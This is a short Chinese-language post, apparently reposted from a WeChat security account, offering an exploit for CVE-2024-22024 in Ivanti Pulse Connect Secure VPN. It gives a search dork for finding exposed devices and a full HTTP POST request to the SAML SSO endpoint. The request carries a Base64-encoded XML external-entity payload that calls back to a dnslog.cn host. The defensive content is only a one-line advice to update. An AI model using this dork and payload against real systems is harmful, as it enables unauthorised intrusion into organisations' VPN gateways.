0x01 前言
0x02 影响平台
Ivanti Pulse Connect Secure VPN
0x03 漏洞复现
搜索语法
body="welcome.cgi?p=logo"
页面是这个酱紫
EXP如下:
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4=
需要Base64编码的XML文件内容如下:
"http://0urx3l.dnslog.cn/x"> %watchTowr;]><r></r>
Success~
0x04 修复方案
建议及时更新至最新版本!
原文始发于微信公众号(EchoSec):CVE-2024-22024 漏洞(附EXP)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论